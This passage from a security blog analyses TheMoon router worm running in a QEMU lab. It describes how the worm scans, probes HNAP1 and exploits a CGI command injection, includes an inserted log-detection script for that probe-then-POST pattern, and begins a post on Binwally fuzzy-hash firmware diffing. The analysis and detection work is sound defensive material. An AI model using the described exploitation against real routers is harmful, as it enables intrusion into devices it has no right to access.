<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5FMjvyzFfFRo5BmA5UOeKE_-E0UCv5z8nlKdUkUGbSwHmXT3F4mnJTmDqqPuquMYGRV02ZhkdDfx2EZzGnwE2WHkIHT-c4kxBkKRLD5tvExGvxRxtFrWi8Rz4A2JyQ2-Qd3ADRoSyczH6/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5FMjvyzFfFRo5BmA5UOeKE_-E0UCv5z8nlKdUkUGbSwHmXT3F4mnJTmDqqPuquMYGRV02ZhkdDfx2EZzGnwE2WHkIHT-c4kxBkKRLD5tvExGvxRxtFrWi8Rz4A2JyQ2-Qd3ADRoSyczH6/s1600/Screenshot-Terminal.png" height="442" width="640" /></a></div>
<br />
If you don't want to use strace, simply start sh chrooted and run the malware:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7CAWKla5phBQuNyFIGKgNJmZM6OagOrH7hncHeU7gtoMBhG2wIWuE6JPkV6KMtTwLiE6-Log1KKAxsV54evve6i1yyHCj8ISMj52iMf-_dscSd0WoeT9KS2acukVcXsEXiqMfTa2rdndn/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7CAWKla5phBQuNyFIGKgNJmZM6OagOrH7hncHeU7gtoMBhG2wIWuE6JPkV6KMtTwLiE6-Log1KKAxsV54evve6i1yyHCj8ISMj52iMf-_dscSd0WoeT9KS2acukVcXsEXiqMfTa2rdndn/s1600/Screenshot-Terminal-7.png" height="442" width="640" /></a></div>
<br />
The worm tries to remove files with certain extensions and performs a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written to disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (debug log).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEismcoFD7TK-pDGuKH1OjpunT4hFrtH8zjyY6aN_e7GOabigmGe5kHyxq1YJcJWHPQN4ly9qJsSD7ben29kTu0kOfZ86xgDyl3guE3jjsamHf8zYFHi6Mh0TZwe3XiwM5ANz6O4M5qudFKo/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEismcoFD7TK-pDGuKH1OjpunT4hFrtH8zjyY6aN_e7GOabigmGe5kHyxq1YJcJWHPQN4ly9qJsSD7ben29kTu0kOfZ86xgDyl3guE3jjsamHf8zYFHi6Mh0TZwe3XiwM5ANz6O4M5qudFKo/s1600/Screenshot-Terminal-5.png" height="416" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<script src="https://gist.github.com/bmaia/9042570.js"></script>
It's possible to dump QEMU's physical memory using the <a href="http://doc.opensuse.org/products/draft/SLES/SLES-kvm_sd_draft/cha.qemu.monitor.html">pmemsave</a> command by hitting CTRL+A, C (to enter QEMU's monitor, its administrative interface) and entering:<br />
<br />
<script src="https://gist.github.com/bmaia/9042866.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTE2LjeKw6mPip-AiaKPCbA4Wq7CoKaZ6jhSzj4UCHEWDTF_95Lu_8yBD4DdzC3ng5xazuuQiyLG53uHVVdayVplxpJI8qfKU8_FHW_zfPRuv9i6dHFWXc7J9MfMpFumdWWQ5Wa87slgG/s1600/Screenshot-Terminal-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTE2LjeKw6mPip-AiaKPCbA4Wq7CoKaZ6jhSzj4UCHEWDTF_95Lu_8yBD4DdzC3ng5xazuuQiyLG53uHVVdayVplxpJI8qfKU8_FHW_zfPRuv9i6dHFWXc7J9MfMpFumdWWQ5Wa87slgG/s1600/Screenshot-Terminal-16.png" height="164" width="640" /></a></div>
<br />
The 256MB raw dump will be saved on your host's local path. You can now try to use Volatility or run strings against it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhQrlo4pFYzHpxAQXuucWa9B_2d4YMGYnRtYvIaiXEMO2s7CHhdt2fXJ-4NcB8Mxv9Elv1n2uK-gI90u95TgtAqOltO3gFYKzH2uQHuIErqVhhdzbjYUH07407MLstJQg9cMW6RgFw3h3/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhQrlo4pFYzHpxAQXuucWa9B_2d4YMGYnRtYvIaiXEMO2s7CHhdt2fXJ-4NcB8Mxv9Elv1n2uK-gI90u95TgtAqOltO3gFYKzH2uQHuIErqVhhdzbjYUH07407MLstJQg9cMW6RgFw3h3/s1600/Screenshot-Terminal-6.png" height="441" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw5nBdqD7b3XLR6eoe8GrRVe-q_Gd-mgF58u-V4PzhBUJe3kN_Fvslo5ILk-nDNcYIl5sGRzO-kZjno1C0gyig3WST9RLRwVy3sp0VTkehXROSSEfDH2HQw_GAqcN7BADTYEK8W3myhXdq/s1600/Screenshot-Terminal-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw5nBdqD7b3XLR6eoe8GrRVe-q_Gd-mgF58u-V4PzhBUJe3kN_Fvslo5ILk-nDNcYIl5sGRzO-kZjno1C0gyig3WST9RLRwVy3sp0VTkehXROSSEfDH2HQw_GAqcN7BADTYEK8W3myhXdq/s1600/Screenshot-Terminal-10.png" height="441" width="640" /></a></div>
<br />
The worm starts scanning for ports 80 and 8080 on a <a href="https://isc.sans.edu/diaryimages/moonnets">hardcoded list of networks</a>. If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends an HTTP POST trying to <a href="http://www.exploit-db.com/exploits/31683/">exploit a command injection</a> in the vulnerable CGI.<br />
<br />
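As an added example (not code from the original post or from SANS), detection logic for the scan-then-exploit behaviour described above and for the earlier remark about finding IPs probing the HNAP1 URL in your logs, run over constructed access-log lines: it flags every source that requested the HNAP1 fingerprint URL and notes any POST to a CGI endpoint from the same source after its probe. The IPs, timestamps and the /placeholder.cgi path are constructed; the post does not name the vulnerable CGI, so that path is a placeholder.

```python
"""Flag HNAP1 probes and probe-then-POST sequences in web-server logs (added example)."""
import re
from collections import defaultdict

# Apache/nginx "combined" format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample: two probing sources, one benign visitor, one unparsable line.
SAMPLE_LOG = """\
198.51.100.7 - - [16/Feb/2014:03:58:40 -0300] "GET /HNAP1/ HTTP/1.1" 200 513 "-" "-"
198.51.100.7 - - [16/Feb/2014:03:58:41 -0300] "POST /placeholder.cgi HTTP/1.1" 200 12 "-" "-"
203.0.113.5 - - [16/Feb/2014:04:01:02 -0300] "GET /HNAP1/ HTTP/1.1" 404 169 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Feb/2014:04:05:00 -0300] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Feb/2014:04:05:01 -0300] "POST /placeholder.cgi HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2014:04:01:03 -0300] "GET /hnap1/ HTTP/1.0" 404 169 "-" "-"
this line is not in combined format and is skipped
""".splitlines()


def parse_line(line: str):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_hnap_probe(path: str) -> bool:
    """The worm fingerprints routers by fetching the HNAP1 URL; match it case-insensitively."""
    return path.split("?")[0].rstrip("/").upper().endswith("/HNAP1")


def analyse(lines):
    """Per source IP that probed HNAP1: probe count, status codes seen, and any
    POST to a .cgi path issued after the probe. A POST from a source that never
    probed is not reported, which keeps ordinary admin-UI traffic out of the list."""
    state = defaultdict(lambda: {"hnap_probes": 0, "statuses": set(), "cgi_posts_after_probe": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if is_hnap_probe(path):
            state[ip]["hnap_probes"] += 1
            state[ip]["statuses"].add(int(rec["status"]))
        elif (rec["method"] == "POST" and path.split("?")[0].lower().endswith(".cgi")
              and state[ip]["hnap_probes"] > 0):
            state[ip]["cgi_posts_after_probe"].append(path)
    return {ip: s for ip, s in state.items() if s["hnap_probes"] > 0}


def likely_exploit_attempts(lines):
    """Sources that probed and then POSTed to a CGI: the strongest signal in the log."""
    return sorted(ip for ip, s in analyse(lines).items() if s["cgi_posts_after_probe"])


if __name__ == "__main__":
    for ip, s in sorted(analyse(SAMPLE_LOG).items()):
        print(ip, s)
    print("probe-then-POST sources:", likely_exploit_attempts(SAMPLE_LOG))
```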
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSdshMX58B1lg8k2qW_wmDi1AcnKKWutRGSy1eZ_A0gs7cB0cIg3sUV1DiR4w8O35UCh36XN4IDzwV7U1tCPDeudw4mbSC-4eNvGEdpCH2uNnVsw7Na-hIr2DsXs7SBch5wiJqbPjFv298/s1600/scanss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSdshMX58B1lg8k2qW_wmDi1AcnKKWutRGSy1eZ_A0gs7cB0cIg3sUV1DiR4w8O35UCh36XN4IDzwV7U1tCPDeudw4mbSC-4eNvGEdpCH2uNnVsw7Na-hIr2DsXs7SBch5wiJqbPjFv298/s1600/scanss.PNG" height="234" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBdNSJ-O6R_r_WFcmbCnuGHCf7Q5Ki4FvHTBR33_WFFTdTmU6hDcjxgr7TXDzgL_mz2V_FUPuGAfSJmL15cpDUwQdF-qfch59BrxzcORmUF0o7ZyldvkOgfKfZFSGZZQpliXNejcVzyyQ3/s1600/diaida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBdNSJ-O6R_r_WFcmbCnuGHCf7Q5Ki4FvHTBR33_WFFTdTmU6hDcjxgr7TXDzgL_mz2V_FUPuGAfSJmL15cpDUwQdF-qfch59BrxzcORmUF0o7ZyldvkOgfKfZFSGZZQpliXNejcVzyyQ3/s1600/diaida.png" height="566" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1jNJabadgbvJJN6pSiqaXBpMxTA5EnhQNEu0Qmn2BNV5CicuKKOFSsbvSyZVsiUKUzhdGCyyrW9HuJ7zhhJDY-UK0JC-_Eg1XIkStg7hvIY7hKlx90DWZDY0ROir4FQHBCLQAq65jgJwm/s1600/w1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1jNJabadgbvJJN6pSiqaXBpMxTA5EnhQNEu0Qmn2BNV5CicuKKOFSsbvSyZVsiUKUzhdGCyyrW9HuJ7zhhJDY-UK0JC-_Eg1XIkStg7hvIY7hKlx90DWZDY0ROir4FQHBCLQAq65jgJwm/s1600/w1.PNG" height="424" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTv8a2YC-cMLMT2Aty8fzbpXsQ13L8Y8kPOtBpoduBA8zaNtnA3i85hJzFqbgbhzcpyaBpAGSQ6MQyHRILCmk-nmqSbIJRDK6M7CIheLt9l1NojoIJDCpOfkpVtBKkwlyMYd3xDsS8dWsk/s1600/w2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTv8a2YC-cMLMT2Aty8fzbpXsQ13L8Y8kPOtBpoduBA8zaNtnA3i85hJzFqbgbhzcpyaBpAGSQ6MQyHRILCmk-nmqSbIJRDK6M7CIheLt9l1NojoIJDCpOfkpVtBKkwlyMYd3xDsS8dWsk/s1600/w2.PNG" height="414" width="640" /></a></div>
<br />
Decoded POST:<br />
<br />
<script src="https://gist.github.com/bmaia/9042580.js"></script>
<br />
TheMoon will also start an HTTPS server ("Lunar Base") on the router, using the random port recorded in the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded, while the other values seem to be random. Searching for these entries in the <a href="https://scans.io/">scans.io</a> SSL certificate datasets would be really interesting.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwVazpgcEu3nr74FKYyVZEKO6JA3rqvpKcv0uBDcsz0weXakpZAVjTQ-J-r4GVOx8_OhVhxf9t2ATXfIRqfbe8a9pHIUems1f-i0vBHhTThS0s0NEafyYDUpCZyEqbQTgY8aQsl5ppCbNA/s1600/output_Su1S8R.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwVazpgcEu3nr74FKYyVZEKO6JA3rqvpKcv0uBDcsz0weXakpZAVjTQ-J-r4GVOx8_OhVhxf9t2ATXfIRqfbe8a9pHIUems1f-i0vBHhTThS0s0NEafyYDUpCZyEqbQTgY8aQsl5ppCbNA/s1600/output_Su1S8R.gif" height="400" width="375" /></a></div>
<br />
The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcNzTOScjoyRioEZpGl2MhbQSrwG6LA7IMom099x32Bgw1t8-GxqerHVAWynZFaQY5cVzY1BBxzZVumuPE6bDGUE-aEK5zjoKRph6tqQ0XFaevSiO4Hxp-cc-gidK-RR2F3Ix89xkCZA3/s1600/Screenshot-Terminal-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcNzTOScjoyRioEZpGl2MhbQSrwG6LA7IMom099x32Bgw1t8-GxqerHVAWynZFaQY5cVzY1BBxzZVumuPE6bDGUE-aEK5zjoKRph6tqQ0XFaevSiO4Hxp-cc-gidK-RR2F3Ix89xkCZA3/s1600/Screenshot-Terminal-12.png" height="425" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHh_W9WwijoY1ThY1GQ0NaiYKE0Ui0yL00pszT9DoZRbgdcEm1MoDgLim4WRj4kzUQNFQhPsOVbDfq_bzOHSFWFIabmoKq1yncduUkARXbn5wQuc-htlCLPgs2nkzMZMaVEPoXyWPvoi99/s1600/Screenshot-gerty.png+(PNG+Image,+285%C2%A0%C3%97%C2%A0196+pixels)+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHh_W9WwijoY1ThY1GQ0NaiYKE0Ui0yL00pszT9DoZRbgdcEm1MoDgLim4WRj4kzUQNFQhPsOVbDfq_bzOHSFWFIabmoKq1yncduUkARXbn5wQuc-htlCLPgs2nkzMZMaVEPoXyWPvoi99/s1600/Screenshot-gerty.png+(PNG+Image,+285%C2%A0%C3%97%C2%A0196+pixels)+-+Mozilla+Firefox.png" height="465" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi74rDCMGsh8kru6xI733iB9jTG3LL7JWntwXM6ezSvL22CuUgthOVawvAwtCXeT1waxXhr2_tN1m266cA1FaARDhChvbEsvhZCwotfDQ8-d6-_uGpz2usxCLIK1g5Kz0apiXDMFSTQwwaJ/s1600/Screenshot-Terminal-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi74rDCMGsh8kru6xI733iB9jTG3LL7JWntwXM6ezSvL22CuUgthOVawvAwtCXeT1waxXhr2_tN1m266cA1FaARDhChvbEsvhZCwotfDQ8-d6-_uGpz2usxCLIK1g5Kz0apiXDMFSTQwwaJ/s1600/Screenshot-Terminal-11.png" height="294" width="640" /></a></div>
<br />
Rkhunter reports a few warnings on the infected system. I have uploaded the complete output from rkhunter to Pastebin; get it <a href="http://pastebin.com/CSkh2jJ5">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHPoV5qSI6P6sG8UYNFh1XheTohjXv9CkI63EPFBLdWhbxvAr9NOEOSiO8MTZ3XX9UAHMngK5P-G4W3uEV2eZ_S4H08kmZRawAPJc2PSFjQnxZ_9GnM2RExU0xLmOU-D5wx9-2fNcDArKe/s1600/Screenshot-Terminal-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHPoV5qSI6P6sG8UYNFh1XheTohjXv9CkI63EPFBLdWhbxvAr9NOEOSiO8MTZ3XX9UAHMngK5P-G4W3uEV2eZ_S4H08kmZRawAPJc2PSFjQnxZ_9GnM2RExU0xLmOU-D5wx9-2fNcDArKe/s1600/Screenshot-Terminal-13.png" height="442" width="640" /></a></div>
<br />
Another useful technique is to compare the contents of the filesystem with a known-good template. You can use <a href="http://w00tsec.blogspot.com.br/2013/12/binwally-directory-tree-diff-tool-using.html">binwally</a>, <a href="http://winmerge.org/">WinMerge</a> or <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">binwalk's hashmatch</a>.<br />
<br />
<script src="https://gist.github.com/bmaia/9042869.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdmg1oOR09HtOIWvG9IJghQ9jvc_jI8lFtOaW8jbR7LW4KcTtXl2q7A0HbNjek_MtCX6l82ei5yH7WlftKv-76ynRofIcLGf9tlPWAp8be-JPZa7-pZLI7Jl9ZUR0Fvw30VqWVdqco_WBL/s1600/Screenshot+from+2014-02-16+15%255E%252544%255E%252522.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdmg1oOR09HtOIWvG9IJghQ9jvc_jI8lFtOaW8jbR7LW4KcTtXl2q7A0HbNjek_MtCX6l82ei5yH7WlftKv-76ynRofIcLGf9tlPWAp8be-JPZa7-pZLI7Jl9ZUR0Fvw30VqWVdqco_WBL/s1600/Screenshot+from+2014-02-16+15%255E%252544%255E%252522.png" height="398" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3PGhrP5claI6kMOOJy5YjvE0qso_genqN0ZGMBOTbWW4hjgQN3SDWxUmGK1CPEvgGjigKp2ubQ8G4Eq2SZ2sFL6DneT3H_qVhgoZpii6Qb7zsbxalvoU-nofPAuuXrIJmeQcrv5r2YaSl/s1600/Screenshot+from+2014-02-16+15%5E%2544%5E%2554.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3PGhrP5claI6kMOOJy5YjvE0qso_genqN0ZGMBOTbWW4hjgQN3SDWxUmGK1CPEvgGjigKp2ubQ8G4Eq2SZ2sFL6DneT3H_qVhgoZpii6Qb7zsbxalvoU-nofPAuuXrIJmeQcrv5r2YaSl/s1600/Screenshot+from+2014-02-16+15%5E%2544%5E%2554.png" height="398" width="640" /></a></div>
<br />
<b>Conclusion</b><br />
<div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;">
<br />
I did not spend much time reversing the files and their functions, as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set up your own virtual lab using QEMU.<br />
<br />
It's still possible to improve the analysis by <a href="https://github.com/zcutlip/nvram-faker">faking the nvram</a>, by <a href="http://wiki.qemu.org/Documentation/Debugging">running a GDB server with QEMU</a> or by using <a href="https://code.google.com/p/volatility/issues/detail?id=436">Volatility with the proper profile and debugging structures</a>, but this post is already way too long. You should also have a look at <a href="http://www.s3.eurecom.fr/tools/avatar/">Avatar</a>, from <a href="http://www.eurecom.fr/rs/system_security_group">EURECOM</a>. Avatar's goal is to enable complex dynamic analysis of embedded firmware in order to assist in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.<br />
<br />
Let's keep drawing public awareness to the security issues of the Internet of Threats, persuading manufacturers, ISPs and end users to collaborate to address these problems.<br />
<br />
</div>
</div>
Bernardo Rodrigues<br />
<br />
<b>Binwally: Directory tree diff tool using Fuzzy Hashing</b> (published 2013-12-03, updated 2013-12-10)<br />
<br />
For this post, I'll discuss the concept of directory tree and binary diffing and how it can be used to find potential vulnerabilities and security issues that were (silently) patched in firmware images.<br />
<br />
Silent patching is a big deal, as we don't have many security researchers like <a href="http://www.h2hc.org.br/h2hc/en/palestrantes#Speaker1">Spender</a> around. It is a common practice among companies that create software and firmware for embedded devices. Changelogs for new firmware often contain little information about security issues, describing the changes as "bugfixes" or "enhancements": we get no CVEs and we don't know how critical the flaws are.<br />
<br />
In addition to that, you may occasionally find a reference to the string <a href="http://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor">'Ac1db1tch3z' in your code</a> (which means that you got a free vulnerability assessment), or your employee <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel might forget to remove a backdoor from the firmware</a>. Diffing the contents of previous firmware versions may be useful to find out when these backdoors were first installed, modified and/or removed.<br />
<br />
I introduce you to Binwally: a simple script to perform directory tree diffing using the concept of Fuzzy Hashing (<a href="http://ssdeep.sourceforge.net/">ssdeep</a>) to define a matching score between binaries.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjniDyzvYttnsln13RtUPbTiePL5i8O9fj8AkVqGZ9M1bqYsm_WMrHIPvk6o0D5CfPqSreaR2gwiZSiL_Lh09DuV3OfYOzxsuBuZRZ6q-RHOvGtf_YeLr8OEHxluExdPPIxnUP7CQAT77b0/s1600/binwally.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjniDyzvYttnsln13RtUPbTiePL5i8O9fj8AkVqGZ9M1bqYsm_WMrHIPvk6o0D5CfPqSreaR2gwiZSiL_Lh09DuV3OfYOzxsuBuZRZ6q-RHOvGtf_YeLr8OEHxluExdPPIxnUP7CQAT77b0/s320/binwally.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Binwally says "no" to Silent Patching</td></tr>
</tbody></table>
<br />
<b>Fuzzy Hashing</b><br />
<br />
Fuzzy Hashing, also known as context triggered piecewise hashing (CTPH), can match inputs that have homologies: such inputs have sequences of identical bytes in the same order, although the bytes in between these sequences may differ in both content and length. The concept was introduced by <a href="https://github.com/tridge">Andrew Tridgell</a> and the most well-known tool is <a href="http://ssdeep.sourceforge.net/">ssdeep</a>, created by <a href="https://twitter.com/jessekornblum">Jesse Kornblum</a>.<br />
<br />
The usage example outlined on <a href="http://ssdeep.sourceforge.net/usage.html">ssdeep's homepage</a> summarizes it well:<br />
<div class="code">
$ ls -l foo.txt<br />
-rw-r--r-- 1 jessekor jessekor 240 Oct 25 08:01 foo.txt</div>
<div class="code">
$ cp foo.txt bar.txt<br />
$ echo 1 >> bar.txt</div>
<br />
A cryptographic hashing algorithm like MD5 can't be used to match these files; they have wildly different hashes.<br />
<div class="code">
$ md5deep foo.txt bar.txt<br />
7b3e9e08ecc391f2da684dd784c5af7c /Users/jessekornblum/foo.txt<br />
32436c952f0f4c53bea1dc955a081de4 /Users/jessekornblum/bar.txt</div>
<br />
But fuzzy hashing can! We compute the fuzzy hash of one file and use the matching mode to match the other one.<br />
<div class="code">
$ ssdeep -b foo.txt > hashes.txt<br />
$ ssdeep -bm hashes.txt bar.txt<br />
bar.txt matches foo.txt (64)</div>
<br />
The number at the end of the line is a match score, or a weighted measure of how similar these files are. The higher the number, the more similar the files.<br />
<div>
<br /></div>
<b>Binwally</b><br />
<br />
Binwally is a simple Python script that uses this concept to diff directory trees in order to find different, unique and matching files, displaying an overall score of the results. It was based on diffall.py from the book <a href="http://www.amazon.com/Programming-Python-Mark-Lutz/dp/0596158106/">Programming Python (4th Edition)</a> and it requires <a href="https://github.com/DinoTools/python-ssdeep">python-ssdeep</a>, a wrapper for <a href="http://ssdeep.sourceforge.net/">ssdeep</a> (which is coded in C). You can download the script from my Github, following the link below:<br />
<br />
<ul>
<li><a href="https://github.com/bmaia/binwally">Download Binwally</a></li>
</ul>
<br />
The code is pretty straightforward: it takes two dirs/files as arguments and displays which files are unique, which ones match and which ones differ, together with their match score. It still needs some improvement (the overall matching score is based on the number of files and doesn't consider file sizes, for example), but it works fine for what it sets out to accomplish.<br />
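The fuzzy hashing walkthrough above and this description of Binwally in working code, as an added example that is neither Binwally's nor ssdeep's: a cut-down spamsum-style CTPH with a single fixed block size and an edit-distance-like score (my simplification, so its numbers are not ssdeep's), plus a directory tree diff that reports unique, matching and differing files with an overall score. The two "firmware" trees it compares are constructed in a temp directory; the file names only echo the D-Link example, the contents are synthetic.

```python
# Added example, not Binwally's or ssdeep's code: a cut-down spamsum-style
# CTPH with one fixed block size; its scores are illustrative, not ssdeep's.
import difflib
import hashlib
import os
import tempfile

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7          # rolling-hash window, as in spamsum/ssdeep
BLOCK_SIZE = 64     # fixed trigger modulus (ssdeep derives it from file size)
FNV_INIT, FNV_PRIME = 0x28021967, 0x01000193


def fuzzy_hash(data: bytes, block_size: int = BLOCK_SIZE) -> str:
    """Return 'block_size:signature'. A rolling hash over the last WINDOW bytes
    picks chunk boundaries and each chunk yields one base64 char from an FNV
    hash of its bytes, so an edit disturbs a few chars, not the whole hash."""
    win = [0] * WINDOW
    h1 = h2 = h3 = 0
    fnv, sig = FNV_INIT, []
    for n, b in enumerate(data):
        h2 = h2 - h1 + WINDOW * b            # weighted sum of the window
        h1 = h1 + b - win[n % WINDOW]        # plain sum of the window
        win[n % WINDOW] = b
        h3 = ((h3 << 5) ^ b) & 0xFFFFFFFF    # shift/xor of the last 7 bytes
        roll = (h1 + h2 + h3) & 0xFFFFFFFF
        fnv = ((fnv * FNV_PRIME) ^ b) & 0xFFFFFFFF
        if roll % block_size == block_size - 1:   # content-defined boundary
            sig.append(B64[fnv & 63])
            fnv = FNV_INIT
    sig.append(B64[fnv & 63])                # the trailing partial chunk
    return f"{block_size}:{''.join(sig)}"


def match_score(hash_a: str, hash_b: str) -> int:
    """0-100 similarity of two fuzzy hashes. As in ssdeep, signatures sharing
    no run of WINDOW chars score 0; otherwise SequenceMatcher's ratio is scaled."""
    (bs_a, sig_a), (bs_b, sig_b) = hash_a.split(":", 1), hash_b.split(":", 1)
    if bs_a != bs_b:
        return 0
    if sig_a == sig_b:
        return 100
    sm = difflib.SequenceMatcher(None, sig_a, sig_b, autojunk=False)
    if not any(m.size >= WINDOW for m in sm.get_matching_blocks()):
        return 0
    return round(sm.ratio() * 100)


def _walk(root: str) -> dict:
    """Relative path -> absolute path for regular files (symlinks skipped)."""
    return {os.path.relpath(os.path.join(d, n), root): os.path.join(d, n)
            for d, _, names in os.walk(root) for n in names
            if os.path.isfile(os.path.join(d, n))
            and not os.path.islink(os.path.join(d, n))}


def diff_trees(left: str, right: str) -> dict:
    """Classify files as unique to one side, match (identical) or differ, with
    an overall score averaged per path (by file count, not size, as the post
    notes): 100 for a match, the fuzzy score for differ, 0 for unique."""
    lf, rf = _walk(left), _walk(right)
    common = sorted(set(lf) & set(rf))
    result = {"unique_left": sorted(set(lf) - set(rf)),
              "unique_right": sorted(set(rf) - set(lf)),
              "match": [], "differ": {}}
    for rel in common:
        with open(lf[rel], "rb") as fa, open(rf[rel], "rb") as fb:
            da, db = fa.read(), fb.read()
        if hashlib.sha256(da).digest() == hashlib.sha256(db).digest():
            result["match"].append(rel)       # same content, implicitly 100
        else:
            result["differ"][rel] = match_score(fuzzy_hash(da), fuzzy_hash(db))
    paths = len(lf) + len(rf) - len(common)
    points = 100 * len(result["match"]) + sum(result["differ"].values())
    result["score"] = round(points / paths) if paths else 100
    return result


def build_sample_trees() -> tuple:
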